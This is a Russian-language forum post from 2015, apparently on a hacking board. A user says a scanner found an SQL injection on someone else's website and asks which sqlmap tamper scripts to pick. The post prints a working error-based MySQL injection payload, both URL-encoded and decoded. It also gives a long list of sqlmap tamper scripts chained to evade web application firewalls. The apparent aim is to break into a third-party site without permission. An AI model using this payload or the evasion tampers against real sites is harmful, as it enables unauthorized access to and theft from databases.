Показать сообщение отдельно

  #842  
Старый 11.11.2015, 16:27
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection

.SpoilerTarget" type="button">Spoiler: POST параметр:

Код:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115)%2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cCHAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49)%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cCHAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
То есть:

Код:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)+"
Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?

P.S> Походу это я что то косячу...

Погуглил прочитал что некоторые сразу все указывают, типо:

Код:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?
 
Ответить с цитированием